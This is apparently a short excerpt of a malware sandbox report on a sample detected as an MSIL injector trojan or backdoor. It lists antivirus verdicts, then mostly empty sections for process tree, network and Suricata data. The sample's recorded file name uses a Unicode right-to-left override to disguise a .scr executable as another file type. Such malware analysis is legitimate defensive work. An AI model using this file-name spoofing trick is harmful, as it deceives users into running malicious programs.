AhnLab-V3	Trojan/Win.MSILZilla.C5129545
Acronis	suspicious
McAfee	RDN/Generic BackDoor
MAX	malware (ai score=84)
Malwarebytes	Malware.AI.4221048470
Rising	Trojan.Generic/MSIL@AI.94 (RDM.MSIL:x9KBdVi4e0L27YyiUtw3kA)
Yandex	Trojan.Injector!EFAYKrC14B0
Ikarus	Trojan.MSIL.Injector
Fortinet	MSIL/Injector.FCD!tr
AVG	Win32:InjectorX-gen [Trj]

Dll%20Injector%20V5%20Full%E2%80%AEnls..scr

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All